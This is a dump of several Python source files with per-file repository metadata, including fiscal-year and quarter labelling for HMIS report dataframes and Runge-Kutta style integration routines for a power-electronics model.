0.9995012 ], dtype=float32)), (array([-0.00633593, 0.00377559, 0.9999728 ], dtype=float32), array([-0.00633593, 0.00377559, 0.9999728 ], dtype=float32)), (array([-0.21811792, 0.3489671 , 0.9113981 ], dtype=float32), array([-0.21811792, 0.3489671 , 0.9113981 ], dtype=float32)), (array([-0.6722757 , 0.73791724, 0.05935918], dtype=float32), array([-0.6722757 , 0.73791724, 0.05935918], dtype=float32)), (array([0.5582719 , 0.55391526, 0.6176653 ], dtype=float32), array([0.5582719 , 0.55391526, 0.6176653 ], dtype=float32)), (array([-0.2231655, 0.7501454, 0.6224781], dtype=float32), array([-0.2231655, 0.7501454, 0.6224781], dtype=float32)), (array([0.7622019 , 0.64307815, 0.07415355], dtype=float32), array([0.7622019 , 0.64307815, 0.07415355], dtype=float32)), (array([0.16055879, 0.9576715 , 0.23892699], dtype=float32), array([0.16055879, 0.9576715 , 0.23892699], dtype=float32)), (array([-0.2641418 , 0.36481354, 0.8928271 ], dtype=float32), array([-0.2641418 , 0.36481354, 0.8928271 ], dtype=float32)), (array([-0.4863434 , 0.32210383, 0.812231 ], dtype=float32), array([-0.4863434 , 0.32210383, 0.812231 ], dtype=float32)), (array([-0.73681074, 0.2887741 , 0.611326 ], dtype=float32), array([-0.73681074, 0.2887741 , 0.611326 ], dtype=float32)), (array([-0.8251932 , 0.32152426, 0.46441174], dtype=float32), array([-0.8251932 , 0.32152426, 0.46441174], dtype=float32)), (array([-0.46061376, 0.53843784, 0.70563424], dtype=float32), array([-0.46061376, 0.53843784, 0.70563424], dtype=float32)), (array([-0.83961487, 0.11658006, 0.53052425], dtype=float32), array([-0.83961487, 0.11658006, 0.53052425], dtype=float32)), (array([0.19307858, 0.7916744 , 0.57963127], dtype=float32), array([0.19307858, 0.7916744 , 0.57963127], dtype=float32)), (array([0.45536417, 0.02749051, 0.8898808 ], dtype=float32), array([0.45536417, 0.02749051, 0.8898808 ], dtype=float32)), (array([-0.21220525, 0.38550192, 0.89797395], dtype=float32), array([-0.21220525, 0.38550192, 0.89797395], dtype=float32)), 
(array([-0.22599094, 0.58135164, 0.78163826], dtype=float32), array([-0.22599094, 0.58135164, 0.78163826], dtype=float32)), (array([0.41129866, 0.1864464 , 0.8922282 ], dtype=float32), array([0.41129866, 0.1864464 , 0.8922282 ], dtype=float32)), (array([-0.17453907, 0.7812475 , 0.59932333], dtype=float32), array([-0.17453907, 0.7812475 , 0.59932333], dtype=float32)), (array([-0.19789232, 0.832047 , 0.51820505], dtype=float32), array([-0.19789232, 0.832047 , 0.51820505], dtype=float32)), (array([-0.288328 , 0.55675024, 0.7790354 ], dtype=float32), array([-0.288328 , 0.55675024, 0.7790354 ], dtype=float32)), (array([-0.5172432 , 0.1742888 , 0.83790386], dtype=float32), array([-0.5172432 , 0.1742888 , 0.83790386], dtype=float32)), (array([0.1972488, 0.9656853, 0.1689521], dtype=float32), array([0.1972488, 0.9656853, 0.1689521], dtype=float32)), (array([-0.7331545 , 0.5111719 , 0.44853964], dtype=float32), array([-0.7331545 , 0.5111719 , 0.44853964], dtype=float32)), (array([0.94324124, 0.30722114, 0.12613949], dtype=float32), array([0.94324124, 0.30722114, 0.12613949], dtype=float32)), (array([-0.6233797 , 0.7819172 , 0.00181112], dtype=float32), array([-0.6233797 , 0.7819172 , 0.00181112], dtype=float32)), (array([0.872727 , 0.44277298, 0.20566884], dtype=float32), array([0.872727 , 0.44277298, 0.20566884], dtype=float32)), (array([0.71819526, 0.40218773, 0.56783855], dtype=float32), array([0.71819526, 0.40218773, 0.56783855], dtype=float32)), (array([0.89904577, 0.3684982 , 0.23648643], dtype=float32), array([0.89904577, 0.3684982 , 0.23648643], dtype=float32)), (array([-0.6410343 , 0.44358504, 0.62634444], dtype=float32), array([-0.6410343 , 0.44358504, 0.62634444], dtype=float32)), (array([0.03117225, 0.10385637, 0.99410367], dtype=float32), array([0.03117225, 0.10385637, 0.99410367], dtype=float32)), (array([-0.37993306, 0.5319161 , 0.75678015], dtype=float32), array([-0.37993306, 0.5319161 , 0.75678015], dtype=float32)), (array([-0.6282891 , 0.7495623 , 
0.20834856], dtype=float32), array([-0.6282891 , 0.7495623 , 0.20834856], dtype=float32)), (array([-0.9715776 , 0.07486337, 0.2245718 ], dtype=float32), array([-0.9715776 , 0.07486337, 0.2245718 ], dtype=float32)), (array([0.5354349 , 0.01971338, 0.8443464 ], dtype=float32), array([0.5354349 , 0.01971338, 0.8443464 ], dtype=float32)), (array([-0.17612877, 0.1997908 , 0.96387875], dtype=float32), array([-0.17612877, 0.1997908 , 0.96387875], dtype=float32)), (array([-0.00562996, 0.08506421, 0.9963596 ], dtype=float32), array([-0.00562996, 0.08506421, 0.9963596 ], dtype=float32)), (array([0.02353438, 0.01709834, 0.9995768 ], dtype=float32), array([0.02353438, 0.01709834, 0.9995768 ], dtype=float32)), (array([-0.27466822, 0.20798938, 0.93877465], dtype=float32), array([-0.27466822, 0.20798938, 0.93877465], dtype=float32)), (array([0.46397662, 0.8786454 , 0.1127295 ], dtype=float32), array([0.46397662, 0.8786454 , 0.1127295 ], dtype=float32)), (array([-0.02994239, 0.04003269, 0.9987496 ], dtype=float32), array([-0.02994239, 0.04003269, 0.9987496 ], dtype=float32)), (array([0.7199542, 0.4097383, 0.5601612], dtype=float32), array([0.7199542, 0.4097383, 0.5601612], dtype=float32)), (array([-0.08770114, 0.3543535 , 0.93098986], dtype=float32), array([-0.08770114, 0.3543535 , 0.93098986], dtype=float32)), (array([-0.8042291 , 0.16861995, 0.5698973 ], dtype=float32), array([-0.8042291 , 0.16861995, 0.5698973 ], dtype=float32)), (array([-0.08932336, 0.79459494, 0.6005333 ], dtype=float32), array([-0.08932336, 0.79459494, 0.6005333 ], dtype=float32)), (array([-0.311367 , 0.3529037, 0.8823319], dtype=float32), array([-0.311367 , 0.3529037, 0.8823319], dtype=float32)), (array([0.1017431 , 0.3072791 , 0.94616485], dtype=float32), array([0.1017431 , 0.3072791 , 0.94616485], dtype=float32)), (array([0.8305629 , 0.55004495, 0.08726849], dtype=float32), array([0.8305629 , 0.55004495, 0.08726849], dtype=float32)), (array([-0.47602233, 0.50834805, 0.71762455], dtype=float32), 
array([-0.47602233, 0.50834805, 0.71762455], dtype=float32)), (array([0.29387048, 0.25486967, 0.92123914], dtype=float32), array([0.29387048, 0.25486967, 0.92123914], dtype=float32)), (array([0.6201913 , 0.11433277, 0.776074 ], dtype=float32), array([0.6201913 , 0.11433277, 0.776074 ], dtype=float32))]
# [[0.9795356522922227, 1.0938137944188668], [1.18674240320129, 0.28212079698952935], [0.07753051181414404, 0.10563547408078137], [2.1343753461250934, 0.7126653369070711], [1.6857133076881683, 1.4084879734501996], [3.111241561705335, 0.34070098638601287], [2.0831216116147973, 0.41362582214161814], [0.06487702821081996, 1.1912584037654694], [1.0053635300466017, 0.6023436764236842], [1.8482527219211597, 1.3054078608735808], [1.9760047390673172, 1.3707564441519273], [0.8593576470248048, 1.2535690353201518], [0.5831925188737834, 1.4966416349723537], [2.1598081185290696, 0.3385186676060782], [2.9762524873070286, 1.1480256166912846], [0.797781198817058, 0.3350696705101968], [1.6279755559695577, 0.04031090325563127], [0.6517864648455095, 0.6670943743580349], [1.1754896614118404, 0.72818257378463], [0.8721963041211681, 0.9217186960372356]]
# [[0.06563908835425439, -0.7720977442273214], [1.1631756158209972, -0.5837777859293005], [1.4623161383480292, -0.6805002113446853], [0.8134014425441641, 0.10330027353143034], [-0.2344741015305116, 0.1101995609349184], [1.5890313063193384, -0.09638451972966194], [1.1295468453653965, -0.17515950699052246], [0.5575299272155383, -1.6672933392984661], [0.7310732519781463, -0.7147024645890313], [-0.05056714785634639, 0.24431383831279307], [-0.02607609891451887, 0.39609874371008263], [-0.08251030076443641, -0.921431341223975], [-0.18151691350416324, -1.2629821798036653], [1.2330845321982808, -0.2181486299694734], [1.2191132783854026, 0.8062542287883501], [1.1290701649811263, -0.7465210082205535], [1.4731870661452182, -0.5305335903393239], [0.7447836793103239, -0.9915328141102466], [0.527914704953845, -0.5846415097766168], [0.3230757516333158, -0.8764978989194223]]
test_data = []
m_data = []
n_data = []
# for i in range(20):
# m = np.random.rand() * np.pi
# n = np.random.rand() * np.pi / 2
# m_data.append(m)
# n_data.append(n)
# x = np.cos(m) * np.sin(n)
# y = np.sin(m) * np.sin(n)
# z = np.cos(n)
# test_data.append((np.array([x, y, z]), np.array([x, y, z])))
# epoch:26661 train loss 0.0009999969872498738
# train(min_loss=0.001, max_try_times=10)
test()
| 107.079365
| 12,512
| 0.666074
| 2,799
| 20,238
| 4.761343
| 0.196499
| 0.090043
| 0.253846
| 0.268778
| 0.720117
| 0.695205
| 0.676821
| 0.666016
| 0.657012
| 0.646507
| 0
| 0.409112
| 0.147544
| 20,238
| 188
| 12,513
| 107.648936
| 0.363378
| 0.728432
| 0
| 0.183673
| 0
| 0
| 0.061586
| 0.00402
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061224
| false
| 0
| 0.068027
| 0.006803
| 0.170068
| 0.081633
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
807be52504bad528b206d95f52ad31ad42af8305
| 152
|
py
|
Python
|
crowdin_api/typing.py
|
dpaskov/crowdin-api-client-python
|
e3be5f5ba567ffd97fdeb3f11b54f81ccb74ad98
|
[
"MIT"
] | 13
|
2021-03-02T02:31:57.000Z
|
2022-03-05T20:03:38.000Z
|
crowdin_api/typing.py
|
dpaskov/crowdin-api-client-python
|
e3be5f5ba567ffd97fdeb3f11b54f81ccb74ad98
|
[
"MIT"
] | 17
|
2021-03-23T09:10:30.000Z
|
2022-03-17T10:05:25.000Z
|
crowdin_api/typing.py
|
dpaskov/crowdin-api-client-python
|
e3be5f5ba567ffd97fdeb3f11b54f81ccb74ad98
|
[
"MIT"
] | 6
|
2021-04-22T07:54:46.000Z
|
2021-12-30T19:38:44.000Z
|
import sys

# TypedDict graduated to the stdlib ``typing`` module in Python 3.8;
# fall back to the ``typing_extensions`` backport on older interpreters.
# The re-export is intentional, hence the noqa on the unused import.
if sys.version_info >= (3, 8):
    from typing import TypedDict  # noqa F401
else:
    from typing_extensions import TypedDict  # noqa F401
| 21.714286
| 56
| 0.717105
| 22
| 152
| 4.863636
| 0.636364
| 0.186916
| 0.35514
| 0.429907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067227
| 0.217105
| 152
| 6
| 57
| 25.333333
| 0.831933
| 0.125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
80aa11ce4fccc9cff91f2cd1d716f2381d7a349c
| 16,759
|
py
|
Python
|
determine_period.py
|
TransitionProjects/Agency-Metrics-FY-18-19
|
5f049445a7f1925156e18f3153027f5bfbab48c0
|
[
"MIT"
] | null | null | null |
determine_period.py
|
TransitionProjects/Agency-Metrics-FY-18-19
|
5f049445a7f1925156e18f3153027f5bfbab48c0
|
[
"MIT"
] | null | null | null |
determine_period.py
|
TransitionProjects/Agency-Metrics-FY-18-19
|
5f049445a7f1925156e18f3153027f5bfbab48c0
|
[
"MIT"
] | null | null | null |
"""
Takes dataframes from various ART reports and identifies the fiscal year and
quarter of each row of data, returning the results as a new dataframe object
"""
from datetime import datetime
import pandas as pd
import numpy as np
class QuarterAndFiscalYear:
def __init__(
self,
dataframe,
exit_date_fill_type=False,
exit_date_fill=datetime(year=2018, month=7, day=1),
fill_na=True
):
"""
:dataframe: a pandas dataframe object created from an HMIS ART excel file
:exit_date_fill_type: a string either "today" or "specify"; default is False
:exit_date_fill: a datetime.datetime object; default value of
July 1st, 2018
:fill_na: a boolean; default is True
"""
self.dataframe = dataframe
self.exit_date_fill_type = exit_date_fill_type
self.exit_fill = exit_date_fill
self.fill_na = fill_na
# a dictionary specifying months, years, and their associated ficsal
# year based upon the federal HUD FY
self.fiscal_years = fiscal_years = {
1: {
2000: "FY 99-00",
2001: "FY 00-01",
2002: "FY 01-02",
2003: "FY 02-03",
2004: "FY 03-04",
2005: "FY 04-05",
2006: "FY 05-06",
2007: "FY 06-07",
2008: "FY 07-08",
2009: "FY 08-09",
2010: "FY 09-10",
2011: "FY 10-11",
2012: "FY 11-12",
2013: "FY 12-13",
2014: "FY 13-14",
2015: "FY 14-15",
2016: "FY 15-16",
2017: "FY 16-17",
2018: "FY 17-18",
2019: "FY 18-19",
2020: "FY 19-20",
2021: "FY 20-21",
2022: "FY 21-22",
2023: "FY 22-23",
2024: "FY 23-24",
2025: "FY 24-25",
2026: "FY 25-26",
2027: "FY 26-27",
2028: "FY 27-28",
2029: "FY 28-29",
2030: "FY 29-30"
},
2: {
2000: "FY 99-00",
2001: "FY 00-01",
2002: "FY 01-02",
2003: "FY 02-03",
2004: "FY 03-04",
2005: "FY 04-05",
2006: "FY 05-06",
2007: "FY 06-07",
2008: "FY 07-08",
2009: "FY 08-09",
2010: "FY 09-10",
2011: "FY 10-11",
2012: "FY 11-12",
2013: "FY 12-13",
2014: "FY 13-14",
2015: "FY 14-15",
2016: "FY 15-16",
2017: "FY 16-17",
2018: "FY 17-18",
2019: "FY 18-19",
2020: "FY 19-20",
2021: "FY 20-21",
2022: "FY 21-22",
2023: "FY 22-23",
2024: "FY 23-24",
2025: "FY 24-25",
2026: "FY 25-26",
2027: "FY 26-27",
2028: "FY 27-28",
2029: "FY 28-29",
2030: "FY 29-30"
},
3: {
2000: "FY 99-00",
2001: "FY 00-01",
2002: "FY 01-02",
2003: "FY 02-03",
2004: "FY 03-04",
2005: "FY 04-05",
2006: "FY 05-06",
2007: "FY 06-07",
2008: "FY 07-08",
2009: "FY 08-09",
2010: "FY 09-10",
2011: "FY 10-11",
2012: "FY 11-12",
2013: "FY 12-13",
2014: "FY 13-14",
2015: "FY 14-15",
2016: "FY 15-16",
2017: "FY 16-17",
2018: "FY 17-18",
2019: "FY 18-19",
2020: "FY 19-20",
2021: "FY 20-21",
2022: "FY 21-22",
2023: "FY 22-23",
2024: "FY 23-24",
2025: "FY 24-25",
2026: "FY 25-26",
2027: "FY 26-27",
2028: "FY 27-28",
2029: "FY 28-29",
2030: "FY 29-30"
},
4: {
2000: "FY 99-00",
2001: "FY 00-01",
2002: "FY 01-02",
2003: "FY 02-03",
2004: "FY 03-04",
2005: "FY 04-05",
2006: "FY 05-06",
2007: "FY 06-07",
2008: "FY 07-08",
2009: "FY 08-09",
2010: "FY 09-10",
2011: "FY 10-11",
2012: "FY 11-12",
2013: "FY 12-13",
2014: "FY 13-14",
2015: "FY 14-15",
2016: "FY 15-16",
2017: "FY 16-17",
2018: "FY 17-18",
2019: "FY 18-19",
2020: "FY 19-20",
2021: "FY 20-21",
2022: "FY 21-22",
2023: "FY 22-23",
2024: "FY 23-24",
2025: "FY 24-25",
2026: "FY 25-26",
2027: "FY 26-27",
2028: "FY 27-28",
2029: "FY 28-29",
2030: "FY 29-30"
},
5: {
2000: "FY 99-00",
2001: "FY 00-01",
2002: "FY 01-02",
2003: "FY 02-03",
2004: "FY 03-04",
2005: "FY 04-05",
2006: "FY 05-06",
2007: "FY 06-07",
2008: "FY 07-08",
2009: "FY 08-09",
2010: "FY 09-10",
2011: "FY 10-11",
2012: "FY 11-12",
2013: "FY 12-13",
2014: "FY 13-14",
2015: "FY 14-15",
2016: "FY 15-16",
2017: "FY 16-17",
2018: "FY 17-18",
2019: "FY 18-19",
2020: "FY 19-20",
2021: "FY 20-21",
2022: "FY 21-22",
2023: "FY 22-23",
2024: "FY 23-24",
2025: "FY 24-25",
2026: "FY 25-26",
2027: "FY 26-27",
2028: "FY 27-28",
2029: "FY 28-29",
2030: "FY 29-30"
},
6: {
2000: "FY 99-00",
2001: "FY 00-01",
2002: "FY 01-02",
2003: "FY 02-03",
2004: "FY 03-04",
2005: "FY 04-05",
2006: "FY 05-06",
2007: "FY 06-07",
2008: "FY 07-08",
2009: "FY 08-09",
2010: "FY 09-10",
2011: "FY 10-11",
2012: "FY 11-12",
2013: "FY 12-13",
2014: "FY 13-14",
2015: "FY 14-15",
2016: "FY 15-16",
2017: "FY 16-17",
2018: "FY 17-18",
2019: "FY 18-19",
2020: "FY 19-20",
2021: "FY 20-21",
2022: "FY 21-22",
2023: "FY 22-23",
2024: "FY 23-24",
2025: "FY 24-25",
2026: "FY 25-26",
2027: "FY 26-27",
2028: "FY 27-28",
2029: "FY 28-29",
2030: "FY 29-30"
},
7: {
2000: "FY 00-01",
2001: "FY 01-02",
2002: "FY 02-03",
2003: "FY 03-04",
2004: "FY 04-05",
2005: "FY 05-06",
2006: "FY 06-07",
2007: "FY 07-08",
2008: "FY 08-09",
2009: "FY 09-10",
2010: "FY 10-11",
2011: "FY 11-12",
2012: "FY 12-13",
2013: "FY 13-14",
2014: "FY 14-15",
2015: "FY 15-16",
2016: "FY 16-17",
2017: "FY 17-18",
2018: "FY 18-19",
2019: "FY 19-20",
2020: "FY 20-21",
2021: "FY 21-22",
2022: "FY 22-23",
2023: "FY 23-24",
2024: "FY 24-25",
2025: "FY 25-26",
2026: "FY 26-27",
2027: "FY 27-28",
2028: "FY 28-29",
2029: "FY 29-30",
2030: "FY 30-31"
},
8: {
2000: "FY 00-01",
2001: "FY 01-02",
2002: "FY 02-03",
2003: "FY 03-04",
2004: "FY 04-05",
2005: "FY 05-06",
2006: "FY 06-07",
2007: "FY 07-08",
2008: "FY 08-09",
2009: "FY 09-10",
2010: "FY 10-11",
2011: "FY 11-12",
2012: "FY 12-13",
2013: "FY 13-14",
2014: "FY 14-15",
2015: "FY 15-16",
2016: "FY 16-17",
2017: "FY 17-18",
2018: "FY 18-19",
2019: "FY 19-20",
2020: "FY 20-21",
2021: "FY 21-22",
2022: "FY 22-23",
2023: "FY 23-24",
2024: "FY 24-25",
2025: "FY 25-26",
2026: "FY 26-27",
2027: "FY 27-28",
2028: "FY 28-29",
2029: "FY 29-30",
2030: "FY 30-31"
},
9: {
2000: "FY 00-01",
2001: "FY 01-02",
2002: "FY 02-03",
2003: "FY 03-04",
2004: "FY 04-05",
2005: "FY 05-06",
2006: "FY 06-07",
2007: "FY 07-08",
2008: "FY 08-09",
2009: "FY 09-10",
2010: "FY 10-11",
2011: "FY 11-12",
2012: "FY 12-13",
2013: "FY 13-14",
2014: "FY 14-15",
2015: "FY 15-16",
2016: "FY 16-17",
2017: "FY 17-18",
2018: "FY 18-19",
2019: "FY 19-20",
2020: "FY 20-21",
2021: "FY 21-22",
2022: "FY 22-23",
2023: "FY 23-24",
2024: "FY 24-25",
2025: "FY 25-26",
2026: "FY 26-27",
2027: "FY 27-28",
2028: "FY 28-29",
2029: "FY 29-30",
2030: "FY 30-31"
},
10: {
2000: "FY 00-01",
2001: "FY 01-02",
2002: "FY 02-03",
2003: "FY 03-04",
2004: "FY 04-05",
2005: "FY 05-06",
2006: "FY 06-07",
2007: "FY 07-08",
2008: "FY 08-09",
2009: "FY 09-10",
2010: "FY 10-11",
2011: "FY 11-12",
2012: "FY 12-13",
2013: "FY 13-14",
2014: "FY 14-15",
2015: "FY 15-16",
2016: "FY 16-17",
2017: "FY 17-18",
2018: "FY 18-19",
2019: "FY 19-20",
2020: "FY 20-21",
2021: "FY 21-22",
2022: "FY 22-23",
2023: "FY 23-24",
2024: "FY 24-25",
2025: "FY 25-26",
2026: "FY 26-27",
2027: "FY 27-28",
2028: "FY 28-29",
2029: "FY 29-30",
2030: "FY 30-31"
},
11: {
2000: "FY 00-01",
2001: "FY 01-02",
2002: "FY 02-03",
2003: "FY 03-04",
2004: "FY 04-05",
2005: "FY 05-06",
2006: "FY 06-07",
2007: "FY 07-08",
2008: "FY 08-09",
2009: "FY 09-10",
2010: "FY 10-11",
2011: "FY 11-12",
2012: "FY 12-13",
2013: "FY 13-14",
2014: "FY 14-15",
2015: "FY 15-16",
2016: "FY 16-17",
2017: "FY 17-18",
2018: "FY 18-19",
2019: "FY 19-20",
2020: "FY 20-21",
2021: "FY 21-22",
2022: "FY 22-23",
2023: "FY 23-24",
2024: "FY 24-25",
2025: "FY 25-26",
2026: "FY 26-27",
2027: "FY 27-28",
2028: "FY 28-29",
2029: "FY 29-30",
2030: "FY 30-31"
},
12: {
2000: "FY 00-01",
2001: "FY 01-02",
2002: "FY 02-03",
2003: "FY 03-04",
2004: "FY 04-05",
2005: "FY 05-06",
2006: "FY 06-07",
2007: "FY 07-08",
2008: "FY 08-09",
2009: "FY 09-10",
2010: "FY 10-11",
2011: "FY 11-12",
2012: "FY 12-13",
2013: "FY 13-14",
2014: "FY 14-15",
2015: "FY 15-16",
2016: "FY 16-17",
2017: "FY 17-18",
2018: "FY 18-19",
2019: "FY 19-20",
2020: "FY 20-21",
2021: "FY 21-22",
2022: "FY 22-23",
2023: "FY 23-24",
2024: "FY 24-25",
2025: "FY 25-26",
2026: "FY 26-27",
2027: "FY 27-28",
2028: "FY 28-29",
2029: "FY 29-30",
2030: "FY 30-31"
}
}
# a dictionary specifying months and their associated ficsal
# year based upon the federal HUD FY
self.quarters = {
1: "Q3",
2: "Q3",
3: "Q3",
4: "Q4",
5: "Q4",
6: "Q4",
7: "Q1",
8: "Q1",
9: "Q1",
10: "Q2",
11: "Q2",
12: "Q2"
}
def get_datetime_column_names(self):
"""
:return: A list of names of columns that contain the datetime64[ns] dtypes
"""
return self.dataframe.select_dtypes(
include=["datetime64[ns]"]
).columns.get_values().tolist()
def follow_fill_command(self):
"""
Fill the nan values in columns with dtypes of datetime64[ns]
:return: a pandas dataframe
"""
# make a local copy of the self.dataframe object
data = self.dataframe
# check the class parameters and fill the nan values in the datetime64[ns]
# columns appropriatly
if self.fill_na and (self.exit_date_fill_type == "today"):
for column in self.get_datetime_column_names():
data[column].fillna(datetime.today(), inplace=True)
elif self.fill_na and (self.exit_date_fill_type == "specify"):
for column in self.get_datetime_column_names():
data[column].fillna(self.exit_fill, inplace=True)
else:
pass
return data
def create_fy_q_columns(self):
    """Append "<col> Fiscal Year" and "<col> Quarter" columns for every
    datetime64[ns] column, looked up from ``self.fiscal_years`` and
    ``self.quarters``.

    :return: a pandas dataframe
    """
    data = self.follow_fill_command()
    for name in self.get_datetime_column_names():
        months = data[name].dt.month
        years = data[name].dt.year
        # Fiscal-year label depends on the (month, year) pair.
        data[name + " Fiscal Year"] = [
            self.fiscal_years[m][y] for m, y in zip(months, years)
        ]
        # Quarter label depends on the month alone.
        data[name + " Quarter"] = [self.quarters[m] for m in months]
    return data
| 32.796477
| 84
| 0.350558
| 1,959
| 16,759
| 2.966309
| 0.100051
| 0.01239
| 0.01239
| 0.01652
| 0.740664
| 0.731027
| 0.726209
| 0.726209
| 0.712442
| 0.701084
| 0
| 0.377202
| 0.518945
| 16,759
| 510
| 85
| 32.860784
| 0.343587
| 0.078764
| 0
| 0.819172
| 0
| 0
| 0.199555
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008715
| false
| 0.002179
| 0.006536
| 0
| 0.023965
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
80ca87e299b82b703f0c50ea0ddc2236996d1d5f
| 6,356
|
py
|
Python
|
dvoc_model/integration_methods.py
|
TragerJoswig-Jones/dvoc_model
|
fb5d369096e436b2e4a518c4f16c3493e36aadfc
|
[
"MIT"
] | null | null | null |
dvoc_model/integration_methods.py
|
TragerJoswig-Jones/dvoc_model
|
fb5d369096e436b2e4a518c4f16c3493e36aadfc
|
[
"MIT"
] | null | null | null |
dvoc_model/integration_methods.py
|
TragerJoswig-Jones/dvoc_model
|
fb5d369096e436b2e4a518c4f16c3493e36aadfc
|
[
"MIT"
] | null | null | null |
import scipy.optimize
import numpy as np
""" Explicit Solvers """
# TODO: Make this equation modular / allow any number of components
def forward_euler_step(dt, components, set_states=True, update_states=False):
    """Explicit (forward) Euler step: dx = f(x) * dt for each component.

    Optionally writes the prediction into states[:, 1] and/or commits it
    via step_states(); returns the list of per-component deltas.
    """
    deltas = [c.dynamics() * dt for c in components]
    if set_states:
        for c, delta in zip(components, deltas):
            c.states[:, 1] = c.states[:, 0] + delta
    if update_states:
        for c in components:
            c.step_states()
    return deltas
def backward_euler_step(dt, components, set_states=True, update_states=False):
    """Backward Euler: forward-Euler predictor, then re-evaluate the
    dynamics at the predicted point and use that slope for the step."""
    predictions = forward_euler_step(dt, components, set_states=set_states, update_states=False)  # predictor
    deltas = []
    for c, k1 in zip(components, predictions):
        slope = c.dynamics(c.states[:, 0] + k1)
        delta = slope * dt
        if set_states:
            c.states[:, 1] = c.states[:, 0] + delta
        deltas.append(delta)
    if update_states:
        for c in components:
            c.step_states()
    return deltas
# TODO: Update below here
def semi_implicit_euler_step(dt, components, set_states=True, update_states=False):
    """Semi-implicit Euler: state 0 keeps its explicit predictor step,
    state 1 is stepped from the dynamics evaluated at the predicted point."""
    k1s = forward_euler_step(dt, components, set_states=set_states, update_states=False)  # predictor
    for k1 in k1s:
        k1[1] = 0  # zero out the predictor step for v_beta / theta
    deltas = []
    for c, k1 in zip(components, k1s):
        k2 = c.dynamics(c.states[:, 0] + k1)
        k2[0] = 0  # state 0 takes no corrector contribution
        delta = k1 + k2 * dt
        if set_states:
            c.states[:, 1] = c.states[:, 0] + delta
        deltas.append(delta)
    if update_states:
        for c in components:
            c.step_states()
    return deltas
def rk2_step(dt, components, set_states=True, update_states=False):
    """Second-order Runge-Kutta (Heun): average the predictor delta with
    the corrector slope evaluated at the predicted point."""
    k1s = forward_euler_step(dt, components, set_states=set_states, update_states=False)  # predictor
    deltas = []
    for c, k1 in zip(components, k1s):
        k2 = c.dynamics(c.states[:, 0] + k1)
        delta = (k1 + k2 * dt) * 0.5  # k1 already includes the dt factor
        if set_states:
            c.states[:, 1] = c.states[:, 0] + delta
        deltas.append(delta)
    if update_states:
        for c in components:
            c.step_states()
    return deltas
def rk2_shift_step(dt, components, set_states=True, update_states=False):
    """RK2 step with a deliberate, fixed per-unit-time bias injected into
    the first two states (test harness for LTE/error-difference studies)."""
    k1s = forward_euler_step(dt, components, set_states=set_states, update_states=False)  # predictor
    deltas = []
    for c, k1 in zip(components, k1s):
        k2 = c.dynamics(c.states[:, 0] + k1)
        delta = (k1 + k2 * dt) * 0.5  # k1 already includes the dt factor
        # TEST: apply the LTE difference error here
        delta[0] += 0.008 * dt
        delta[1] -= 5e-5 * dt
        if set_states:
            c.states[:, 1] = c.states[:, 0] + delta
        deltas.append(delta)
    if update_states:
        for c in components:
            c.step_states()
    return deltas
def euler_rk2_step(dt, components, set_states=True, update_states=False):
    """Mixed step: RK2 for all states except state 0, which keeps its
    forward-Euler contribution.

    Bug fix: the prediction used to be assigned to ``component.states``
    itself, replacing the 2-column state array with a 1-D vector and
    breaking the subsequent ``states[:, 0]`` reads / ``step_states()``;
    it now writes the prediction column ``states[:, 1]`` like every
    other integrator in this module.
    """
    k1s = forward_euler_step(dt, components, set_states=set_states, update_states=False)  # Estimation Step
    dxs = []
    for component, k1 in zip(components, k1s):
        k2dt = component.dynamics(component.states[:, 0] + k1)
        # NOTE(review): k1 is already slope*dt, yet it is re-multiplied by dt
        # below for index 0 -- looks dimensionally suspect; kept as-is.
        k2dt[0] = k1[0]  # First state uses forward euler
        dx = (k1 + k2dt * dt) * 0.5  # k1 already took dt into account
        if set_states:
            component.states[:, 1] = component.states[:, 0] + dx
        dxs.append(dx)
    if update_states:
        for component in components:
            component.step_states()
    return dxs
def rk4_step(dt, components, set_states=True, update_states=False):
    """Classic fourth-order Runge-Kutta step for every component."""
    x0s = [c.states[:, 0] for c in components]
    # Four slope evaluations: start, two midpoints, and the far end.
    k1s = [c.dynamics(x0) for c, x0 in zip(components, x0s)]
    k2s = [c.dynamics(x0 + k1 * dt / 2) for c, x0, k1 in zip(components, x0s, k1s)]
    k3s = [c.dynamics(x0 + k2 * dt / 2) for c, x0, k2 in zip(components, x0s, k2s)]
    k4s = [c.dynamics(x0 + k3 * dt) for c, x0, k3 in zip(components, x0s, k3s)]
    deltas = []
    for c, k1, k2, k3, k4 in zip(components, k1s, k2s, k3s, k4s):
        slope = (k1 + 2 * k2 + 2 * k3 + k4) / 6  # weighted-average slope
        if set_states:
            c.states[:, 1] = c.states[:, 0] + slope * dt
        deltas.append(slope * dt)
    if update_states:
        for c in components:
            c.step_states()
    return deltas
""" Implicit Solvers """
def tustin_step(dt, components, set_states=True, update_states=False):
    """Trapezoidal (Tustin) update; each component supplies its own
    implicit solve via component.tustin_step()."""
    deltas = []
    for c in components:
        current = c.states[:, 0]
        advanced = c.tustin_step(x=current)
        if set_states:
            c.states[:, 1] = advanced  # stage the new state
        deltas.append(advanced - current)
    if update_states:
        for c in components:
            c.step_states()
    return deltas
def backward_step(dt, components, set_states=True, update_states=False):
    """Implicit backward update; each component supplies its own solve
    via component.backward_step()."""
    deltas = []
    for c in components:
        current = c.states[:, 0]
        advanced = c.backward_step(x=current)
        if set_states:
